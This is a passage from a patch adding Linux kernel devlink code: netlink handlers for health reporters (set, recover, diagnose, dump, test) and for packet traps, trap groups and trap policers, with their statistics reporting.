++				msg, reporter, DEVLINK_CMD_HEALTH_REPORTER_GET,
++				NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
++				NLM_F_MULTI);
++			if (err) {
++				mutex_unlock(&devlink->reporters_lock);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		mutex_unlock(&devlink->reporters_lock);
++		devlink_put(devlink);
++	}
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(port, &devlink->port_list, list) {
++			mutex_lock(&port->reporters_lock);
++			list_for_each_entry(reporter, &port->reporter_list, list) {
++				if (idx < start) {
++					idx++;
++					continue;
++				}
++				err = devlink_nl_health_reporter_fill(
++					msg, reporter,
++					DEVLINK_CMD_HEALTH_REPORTER_GET,
++					NETLINK_CB(cb->skb).portid,
++					cb->nlh->nlmsg_seq, NLM_F_MULTI);
++				if (err) {
++					mutex_unlock(&port->reporters_lock);
++					devl_unlock(devlink);
++					devlink_put(devlink);
++					goto out;
++				}
++				idx++;
++			}
++			mutex_unlock(&port->reporters_lock);
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++devlink_nl_cmd_health_reporter_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->recover &&
++	    (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD] ||
++	     info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++	if (!reporter->ops->dump &&
++	    info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD])
++		reporter->graceful_period =
++			nla_get_u64(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_GRACEFUL_PERIOD]);
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER])
++		reporter->auto_recover =
++			nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_RECOVER]);
++
++	if (info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP])
++		reporter->auto_dump =
++		nla_get_u8(info->attrs[DEVLINK_ATTR_HEALTH_REPORTER_AUTO_DUMP]);
++
++	devlink_health_reporter_put(reporter);
++	return 0;
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int devlink_nl_cmd_health_reporter_recover_doit(struct sk_buff *skb,
++						       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	err = devlink_health_reporter_recover(reporter, NULL, info->extack);
++
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int devlink_nl_cmd_health_reporter_diagnose_doit(struct sk_buff *skb,
++							struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	struct devlink_fmsg *fmsg;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->diagnose) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	fmsg = devlink_fmsg_alloc();
++	if (!fmsg) {
++		devlink_health_reporter_put(reporter);
++		return -ENOMEM;
++	}
++
++	err = devlink_fmsg_obj_nest_start(fmsg);
++	if (err)
++		goto out;
++
++	err = reporter->ops->diagnose(reporter, fmsg, info->extack);
++	if (err)
++		goto out;
++
++	err = devlink_fmsg_obj_nest_end(fmsg);
++	if (err)
++		goto out;
++
++	err = devlink_fmsg_snd(fmsg, info,
++			       DEVLINK_CMD_HEALTH_REPORTER_DIAGNOSE, 0);
++
++out:
++	devlink_fmsg_free(fmsg);
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int
++devlink_nl_cmd_health_reporter_dump_get_dumpit(struct sk_buff *skb,
++					       struct netlink_callback *cb)
++{
++	struct devlink_health_reporter *reporter;
++	u64 start = cb->args[0];
++	int err;
++
++	reporter = devlink_health_reporter_get_from_cb(cb);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->dump) {
++		err = -EOPNOTSUPP;
++		goto out;
++	}
++	mutex_lock(&reporter->dump_lock);
++	if (!start) {
++		err = devlink_health_do_dump(reporter, NULL, cb->extack);
++		if (err)
++			goto unlock;
++		cb->args[1] = reporter->dump_ts;
++	}
++	if (!reporter->dump_fmsg || cb->args[1] != reporter->dump_ts) {
++		NL_SET_ERR_MSG_MOD(cb->extack, "Dump trampled, please retry");
++		err = -EAGAIN;
++		goto unlock;
++	}
++
++	err = devlink_fmsg_dumpit(reporter->dump_fmsg, skb, cb,
++				  DEVLINK_CMD_HEALTH_REPORTER_DUMP_GET);
++unlock:
++	mutex_unlock(&reporter->dump_lock);
++out:
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++static int
++devlink_nl_cmd_health_reporter_dump_clear_doit(struct sk_buff *skb,
++					       struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->dump) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	mutex_lock(&reporter->dump_lock);
++	devlink_health_dump_clear(reporter);
++	mutex_unlock(&reporter->dump_lock);
++	devlink_health_reporter_put(reporter);
++	return 0;
++}
++
++static int devlink_nl_cmd_health_reporter_test_doit(struct sk_buff *skb,
++						    struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_health_reporter *reporter;
++	int err;
++
++	reporter = devlink_health_reporter_get_from_info(devlink, info);
++	if (!reporter)
++		return -EINVAL;
++
++	if (!reporter->ops->test) {
++		devlink_health_reporter_put(reporter);
++		return -EOPNOTSUPP;
++	}
++
++	err = reporter->ops->test(reporter, info->extack);
++
++	devlink_health_reporter_put(reporter);
++	return err;
++}
++
++struct devlink_stats {
++	u64_stats_t rx_bytes;
++	u64_stats_t rx_packets;
++	struct u64_stats_sync syncp;
++};
++
++/**
++ * struct devlink_trap_policer_item - Packet trap policer attributes.
++ * @policer: Immutable packet trap policer attributes.
++ * @rate: Rate in packets / sec.
++ * @burst: Burst size in packets.
++ * @list: trap_policer_list member.
++ *
++ * Describes packet trap policer attributes. Created by devlink during trap
++ * policer registration.
++ */
++struct devlink_trap_policer_item {
++	const struct devlink_trap_policer *policer;
++	u64 rate;
++	u64 burst;
++	struct list_head list;
++};
++
++/**
++ * struct devlink_trap_group_item - Packet trap group attributes.
++ * @group: Immutable packet trap group attributes.
++ * @policer_item: Associated policer item. Can be NULL.
++ * @list: trap_group_list member.
++ * @stats: Trap group statistics.
++ *
++ * Describes packet trap group attributes. Created by devlink during trap
++ * group registration.
++ */
++struct devlink_trap_group_item {
++	const struct devlink_trap_group *group;
++	struct devlink_trap_policer_item *policer_item;
++	struct list_head list;
++	struct devlink_stats __percpu *stats;
++};
++
++/**
++ * struct devlink_trap_item - Packet trap attributes.
++ * @trap: Immutable packet trap attributes.
++ * @group_item: Associated group item.
++ * @list: trap_list member.
++ * @action: Trap action.
++ * @stats: Trap statistics.
++ * @priv: Driver private information.
++ *
++ * Describes both mutable and immutable packet trap attributes. Created by
++ * devlink during trap registration and used for all trap related operations.
++ */
++struct devlink_trap_item {
++	const struct devlink_trap *trap;
++	struct devlink_trap_group_item *group_item;
++	struct list_head list;
++	enum devlink_trap_action action;
++	struct devlink_stats __percpu *stats;
++	void *priv;
++};
++
++static struct devlink_trap_policer_item *
++devlink_trap_policer_item_lookup(struct devlink *devlink, u32 id)
++{
++	struct devlink_trap_policer_item *policer_item;
++
++	list_for_each_entry(policer_item, &devlink->trap_policer_list, list) {
++		if (policer_item->policer->id == id)
++			return policer_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_item *
++devlink_trap_item_lookup(struct devlink *devlink, const char *name)
++{
++	struct devlink_trap_item *trap_item;
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list) {
++		if (!strcmp(trap_item->trap->name, name))
++			return trap_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_item *
++devlink_trap_item_get_from_info(struct devlink *devlink,
++				struct genl_info *info)
++{
++	struct nlattr *attr;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_NAME])
++		return NULL;
++	attr = info->attrs[DEVLINK_ATTR_TRAP_NAME];
++
++	return devlink_trap_item_lookup(devlink, nla_data(attr));
++}
++
++static int
++devlink_trap_action_get_from_info(struct genl_info *info,
++				  enum devlink_trap_action *p_trap_action)
++{
++	u8 val;
++
++	val = nla_get_u8(info->attrs[DEVLINK_ATTR_TRAP_ACTION]);
++	switch (val) {
++	case DEVLINK_TRAP_ACTION_DROP:
++	case DEVLINK_TRAP_ACTION_TRAP:
++	case DEVLINK_TRAP_ACTION_MIRROR:
++		*p_trap_action = val;
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int devlink_trap_metadata_put(struct sk_buff *msg,
++				     const struct devlink_trap *trap)
++{
++	struct nlattr *attr;
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_TRAP_METADATA);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_IN_PORT) &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT))
++		goto nla_put_failure;
++	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_FA_COOKIE) &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static void devlink_trap_stats_read(struct devlink_stats __percpu *trap_stats,
++				    struct devlink_stats *stats)
++{
++	int i;
++
++	memset(stats, 0, sizeof(*stats));
++	for_each_possible_cpu(i) {
++		struct devlink_stats *cpu_stats;
++		u64 rx_packets, rx_bytes;
++		unsigned int start;
++
++		cpu_stats = per_cpu_ptr(trap_stats, i);
++		do {
++			start = u64_stats_fetch_begin_irq(&cpu_stats->syncp);
++			rx_packets = u64_stats_read(&cpu_stats->rx_packets);
++			rx_bytes = u64_stats_read(&cpu_stats->rx_bytes);
++		} while (u64_stats_fetch_retry_irq(&cpu_stats->syncp, start));
++
++		u64_stats_add(&stats->rx_packets, rx_packets);
++		u64_stats_add(&stats->rx_bytes, rx_bytes);
++	}
++}
++
++static int
++devlink_trap_group_stats_put(struct sk_buff *msg,
++			     struct devlink_stats __percpu *trap_stats)
++{
++	struct devlink_stats stats;
++	struct nlattr *attr;
++
++	devlink_trap_stats_read(trap_stats, &stats);
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
++			      u64_stats_read(&stats.rx_packets),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
++			      u64_stats_read(&stats.rx_bytes),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_trap_stats_put(struct sk_buff *msg, struct devlink *devlink,
++				  const struct devlink_trap_item *trap_item)
++{
++	struct devlink_stats stats;
++	struct nlattr *attr;
++	u64 drops = 0;
++	int err;
++
++	if (devlink->ops->trap_drop_counter_get) {
++		err = devlink->ops->trap_drop_counter_get(devlink,
++							  trap_item->trap,
++							  &drops);
++		if (err)
++			return err;
++	}
++
++	devlink_trap_stats_read(trap_item->stats, &stats);
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (devlink->ops->trap_drop_counter_get &&
++	    nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
++			      u64_stats_read(&stats.rx_packets),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
++			      u64_stats_read(&stats.rx_bytes),
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_trap_fill(struct sk_buff *msg, struct devlink *devlink,
++				const struct devlink_trap_item *trap_item,
++				enum devlink_command cmd, u32 portid, u32 seq,
++				int flags)
++{
++	struct devlink_trap_group_item *group_item = trap_item->group_item;
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
++			   group_item->group->name))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_NAME, trap_item->trap->name))
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_TYPE, trap_item->trap->type))
++		goto nla_put_failure;
++
++	if (trap_item->trap->generic &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
++		goto nla_put_failure;
++
++	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_ACTION, trap_item->action))
++		goto nla_put_failure;
++
++	err = devlink_trap_metadata_put(msg, trap_item->trap);
++	if (err)
++		goto nla_put_failure;
++
++	err = devlink_trap_stats_put(msg, devlink, trap_item);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_get_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_item *trap_item;
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_list))
++		return -EOPNOTSUPP;
++
++	trap_item = devlink_trap_item_get_from_info(devlink, info);
++	if (!trap_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_fill(msg, devlink, trap_item,
++				   DEVLINK_CMD_TRAP_NEW, info->snd_portid,
++				   info->snd_seq, 0);
++	if (err)
++		goto err_trap_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_get_dumpit(struct sk_buff *msg,
++					  struct netlink_callback *cb)
++{
++	struct devlink_trap_item *trap_item;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(trap_item, &devlink->trap_list, list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_fill(msg, devlink, trap_item,
++						   DEVLINK_CMD_TRAP_NEW,
++						   NETLINK_CB(cb->skb).portid,
++						   cb->nlh->nlmsg_seq,
++						   NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int __devlink_trap_action_set(struct devlink *devlink,
++				     struct devlink_trap_item *trap_item,
++				     enum devlink_trap_action trap_action,
++				     struct netlink_ext_ack *extack)
++{
++	int err;
++
++	if (trap_item->action != trap_action &&
++	    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP) {
++		NL_SET_ERR_MSG_MOD(extack, "Cannot change action of non-drop traps. Skipping");
++		return 0;
++	}
++
++	err = devlink->ops->trap_action_set(devlink, trap_item->trap,
++					    trap_action, extack);
++	if (err)
++		return err;
++
++	trap_item->action = trap_action;
++
++	return 0;
++}
++
++static int devlink_trap_action_set(struct devlink *devlink,
++				   struct devlink_trap_item *trap_item,
++				   struct genl_info *info)
++{
++	enum devlink_trap_action trap_action;
++	int err;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
++		return 0;
++
++	err = devlink_trap_action_get_from_info(info, &trap_action);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
++		return -EINVAL;
++	}
++
++	return __devlink_trap_action_set(devlink, trap_item, trap_action,
++					 info->extack);
++}
++
++static int devlink_nl_cmd_trap_set_doit(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_item *trap_item;
++
++	if (list_empty(&devlink->trap_list))
++		return -EOPNOTSUPP;
++
++	trap_item = devlink_trap_item_get_from_info(devlink, info);
++	if (!trap_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
++		return -ENOENT;
++	}
++
++	return devlink_trap_action_set(devlink, trap_item, info);
++}
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_lookup(struct devlink *devlink, const char *name)
++{
++	struct devlink_trap_group_item *group_item;
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
++		if (!strcmp(group_item->group->name, name))
++			return group_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_lookup_by_id(struct devlink *devlink, u16 id)
++{
++	struct devlink_trap_group_item *group_item;
++
++	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
++		if (group_item->group->id == id)
++			return group_item;
++	}
++
++	return NULL;
++}
++
++static struct devlink_trap_group_item *
++devlink_trap_group_item_get_from_info(struct devlink *devlink,
++				      struct genl_info *info)
++{
++	char *name;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME])
++		return NULL;
++	name = nla_data(info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME]);
++
++	return devlink_trap_group_item_lookup(devlink, name);
++}
++
++static int
++devlink_nl_trap_group_fill(struct sk_buff *msg, struct devlink *devlink,
++			   const struct devlink_trap_group_item *group_item,
++			   enum devlink_command cmd, u32 portid, u32 seq,
++			   int flags)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
++			   group_item->group->name))
++		goto nla_put_failure;
++
++	if (group_item->group->generic &&
++	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
++		goto nla_put_failure;
++
++	if (group_item->policer_item &&
++	    nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
++			group_item->policer_item->policer->id))
++		goto nla_put_failure;
++
++	err = devlink_trap_group_stats_put(msg, group_item->stats);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_group_get_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_group_item *group_item;
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_group_list))
++		return -EOPNOTSUPP;
++
++	group_item = devlink_trap_group_item_get_from_info(devlink, info);
++	if (!group_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_group_fill(msg, devlink, group_item,
++					 DEVLINK_CMD_TRAP_GROUP_NEW,
++					 info->snd_portid, info->snd_seq, 0);
++	if (err)
++		goto err_trap_group_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_group_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_group_get_dumpit(struct sk_buff *msg,
++						struct netlink_callback *cb)
++{
++	enum devlink_command cmd = DEVLINK_CMD_TRAP_GROUP_NEW;
++	struct devlink_trap_group_item *group_item;
++	u32 portid = NETLINK_CB(cb->skb).portid;
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		devl_lock(devlink);
++		list_for_each_entry(group_item, &devlink->trap_group_list,
++				    list) {
++			if (idx < start) {
++				idx++;
++				continue;
++			}
++			err = devlink_nl_trap_group_fill(msg, devlink,
++							 group_item, cmd,
++							 portid,
++							 cb->nlh->nlmsg_seq,
++							 NLM_F_MULTI);
++			if (err) {
++				devl_unlock(devlink);
++				devlink_put(devlink);
++				goto out;
++			}
++			idx++;
++		}
++		devl_unlock(devlink);
++		devlink_put(devlink);
++	}
++out:
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int
++__devlink_trap_group_action_set(struct devlink *devlink,
++				struct devlink_trap_group_item *group_item,
++				enum devlink_trap_action trap_action,
++				struct netlink_ext_ack *extack)
++{
++	const char *group_name = group_item->group->name;
++	struct devlink_trap_item *trap_item;
++	int err;
++
++	if (devlink->ops->trap_group_action_set) {
++		err = devlink->ops->trap_group_action_set(devlink, group_item->group,
++							  trap_action, extack);
++		if (err)
++			return err;
++
++		list_for_each_entry(trap_item, &devlink->trap_list, list) {
++			if (strcmp(trap_item->group_item->group->name, group_name))
++				continue;
++			if (trap_item->action != trap_action &&
++			    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP)
++				continue;
++			trap_item->action = trap_action;
++		}
++
++		return 0;
++	}
++
++	list_for_each_entry(trap_item, &devlink->trap_list, list) {
++		if (strcmp(trap_item->group_item->group->name, group_name))
++			continue;
++		err = __devlink_trap_action_set(devlink, trap_item,
++						trap_action, extack);
++		if (err)
++			return err;
++	}
++
++	return 0;
++}
++
++static int
++devlink_trap_group_action_set(struct devlink *devlink,
++			      struct devlink_trap_group_item *group_item,
++			      struct genl_info *info, bool *p_modified)
++{
++	enum devlink_trap_action trap_action;
++	int err;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
++		return 0;
++
++	err = devlink_trap_action_get_from_info(info, &trap_action);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
++		return -EINVAL;
++	}
++
++	err = __devlink_trap_group_action_set(devlink, group_item, trap_action,
++					      info->extack);
++	if (err)
++		return err;
++
++	*p_modified = true;
++
++	return 0;
++}
++
++static int devlink_trap_group_set(struct devlink *devlink,
++				  struct devlink_trap_group_item *group_item,
++				  struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	const struct devlink_trap_policer *policer;
++	struct nlattr **attrs = info->attrs;
++	int err;
++
++	if (!attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
++		return 0;
++
++	if (!devlink->ops->trap_group_set)
++		return -EOPNOTSUPP;
++
++	policer_item = group_item->policer_item;
++	if (attrs[DEVLINK_ATTR_TRAP_POLICER_ID]) {
++		u32 policer_id;
++
++		policer_id = nla_get_u32(attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
++		policer_item = devlink_trap_policer_item_lookup(devlink,
++								policer_id);
++		if (policer_id && !policer_item) {
++			NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++			return -ENOENT;
++		}
++	}
++	policer = policer_item ? policer_item->policer : NULL;
++
++	err = devlink->ops->trap_group_set(devlink, group_item->group, policer,
++					   extack);
++	if (err)
++		return err;
++
++	group_item->policer_item = policer_item;
++
++	return 0;
++}
++
++static int devlink_nl_cmd_trap_group_set_doit(struct sk_buff *skb,
++					      struct genl_info *info)
++{
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct devlink_trap_group_item *group_item;
++	bool modified = false;
++	int err;
++
++	if (list_empty(&devlink->trap_group_list))
++		return -EOPNOTSUPP;
++
++	group_item = devlink_trap_group_item_get_from_info(devlink, info);
++	if (!group_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
++		return -ENOENT;
++	}
++
++	err = devlink_trap_group_action_set(devlink, group_item, info,
++					    &modified);
++	if (err)
++		return err;
++
++	err = devlink_trap_group_set(devlink, group_item, info);
++	if (err)
++		goto err_trap_group_set;
++
++	return 0;
++
++err_trap_group_set:
++	if (modified)
++		NL_SET_ERR_MSG_MOD(extack, "Trap group set failed, but some changes were committed already");
++	return err;
++}
++
++static struct devlink_trap_policer_item *
++devlink_trap_policer_item_get_from_info(struct devlink *devlink,
++					struct genl_info *info)
++{
++	u32 id;
++
++	if (!info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
++		return NULL;
++	id = nla_get_u32(info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
++
++	return devlink_trap_policer_item_lookup(devlink, id);
++}
++
++static int
++devlink_trap_policer_stats_put(struct sk_buff *msg, struct devlink *devlink,
++			       const struct devlink_trap_policer *policer)
++{
++	struct nlattr *attr;
++	u64 drops;
++	int err;
++
++	if (!devlink->ops->trap_policer_counter_get)
++		return 0;
++
++	err = devlink->ops->trap_policer_counter_get(devlink, policer, &drops);
++	if (err)
++		return err;
++
++	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
++	if (!attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
++			      DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	nla_nest_end(msg, attr);
++
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(msg, attr);
++	return -EMSGSIZE;
++}
++
++static int
++devlink_nl_trap_policer_fill(struct sk_buff *msg, struct devlink *devlink,
++			     const struct devlink_trap_policer_item *policer_item,
++			     enum devlink_command cmd, u32 portid, u32 seq,
++			     int flags)
++{
++	void *hdr;
++	int err;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
++			policer_item->policer->id))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_RATE,
++			      policer_item->rate, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_BURST,
++			      policer_item->burst, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++	err = devlink_trap_policer_stats_put(msg, devlink,
++					     policer_item->policer);
++	if (err)
++		goto nla_put_failure;
++
++	genlmsg_end(msg, hdr);
++
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_trap_policer_get_doit(struct sk_buff *skb,
++						struct genl_info *info)
++{
++	struct devlink_trap_policer_item *policer_item;
++	struct netlink_ext_ack *extack = info->extack;
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (list_empty(&devlink->trap_policer_list))
++		return -EOPNOTSUPP;
++
++	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
++	if (!policer_item) {
++		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
++		return -ENOENT;
++	}
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item,
++					   DEVLINK_CMD_TRAP_POLICER_NEW,
++					   info->snd_portid, info->snd_seq, 0);
++	if (err)
++		goto err_trap_policer_fill;
++
++	return genlmsg_reply(msg, info);
++
++err_trap_policer_fill:
++	nlmsg_free(msg);
++	return err;
++}
++
++static int devlink_nl_cmd_trap_policer_get_dumpit(struct sk_buff *msg,
++						  struct netlink_callback *cb)
++{
